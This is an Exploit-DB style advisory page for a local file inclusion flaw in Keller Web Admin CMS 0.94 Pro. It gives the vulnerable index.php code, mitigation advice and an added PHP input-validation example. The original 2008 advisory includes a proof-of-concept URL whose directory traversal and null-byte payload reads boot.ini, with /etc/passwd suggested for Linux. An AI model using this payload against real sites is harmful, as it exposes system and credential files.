Vendor: Keller Web Admin CMS
By: CWH Underground
CVSS: 6.5 (MEDIUM)
Type: Local File Inclusion
CWE: 98
Product Name: Keller Web Admin CMS
Affected Version From: 0.94 Pro
Affected Version To: 0.94 Pro
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Keller Web Admin CMS Local File Inclusion Vulnerability

/Public/index.php concatenates the 'action' GET parameter into an include() path without validating it. By supplying directory traversal sequences in 'action' (with a trailing %00 null byte to cut off the appended ".inc.php" suffix), an attacker can include local files from the target system and read sensitive files.

Mitigation:

To mitigate this vulnerability, it is recommended to sanitize user input and validate the 'action' parameter before including files in the code. Additionally, limiting access to sensitive files and directories can also help prevent exploitation.
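
One way to apply this mitigation to the 'action' handling in /Public/index.php, shown as an added example that is not code from Keller Web Admin CMS or the advisory. The function name resolve_action_include(), the allowlisted action names and the demo folder are assumptions made for illustration.

```php
<?php
// Added example, not code from Keller Web Admin CMS.
// Hypothetical names: resolve_action_include(), the action allowlist, the demo folder.

function resolve_action_include(string $includeFolder, $action, array $allowed): ?string
{
    // Reject arrays (?action[]=x), NUL bytes, dots and slashes: plain names only.
    // \A and \z anchor the whole string; "$" would tolerate a trailing newline.
    if (!is_string($action) || !preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $action)) {
        return null;
    }
    // Allowlist: only actions the application actually ships.
    if (!in_array($action, $allowed, true)) {
        return null;
    }
    // Defence in depth: canonicalise and confirm the file is inside the include folder.
    $base = realpath($includeFolder);
    $path = realpath($includeFolder . $action . '.inc.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($path, $prefix, strlen($prefix)) === 0 ? $path : null;
}

// Constructed demo: a temporary include folder holding one legitimate action file.
$includeFolder = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'kwa_demo_inc' . DIRECTORY_SEPARATOR;
if (!is_dir($includeFolder)) {
    mkdir($includeFolder);
}
file_put_contents($includeFolder . 'login.inc.php', "<?php // constructed demo file\n");

// Constructed inputs: one valid action, the advisory's traversal string, and edge cases.
$samples = ['login', "../../../../../../../../boot.ini\0", '../login', 'logout', ['x'], "login\n"];
foreach ($samples as $s) {
    $path = resolve_action_include($includeFolder, $s, ['login', 'logout']);
    echo json_encode($s), ' => ', $path === null ? 'rejected' : 'include ' . basename($path), "\n";
}
```

In index.php the returned path would take the place of $inclConfig, with the request refused when the function returns null.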

Exploit-DB raw data:

===========================================================
  Keller Web Admin CMS Local File Inclusion Vulnerability
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 26 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Keller Web Admin CMS
 VERSION     : 0.94 Pro
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/kwa
#####################################################

--- Local File Inclusion ---

-------------------------------------
 Vulnerable File [/Public/index.php]
-------------------------------------

@Line 

   21:  if (isset($_GET['action'])) {
   22:      $action=$_GET['action'];
   23:      $inclConfig = $includeFolder.$action.".inc.php";
   24:      include($inclConfig);
   25:      header('Location: '.$clnt_referer);
   26:      die();
   27:  }

---------
 Exploit
---------

[+] http://[Target]/[kwa_path]/Public/index.php?action=[LFI]

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/kwa/Public/index.php?action=../../../../../../../../boot.ini%00

    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS.


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-26]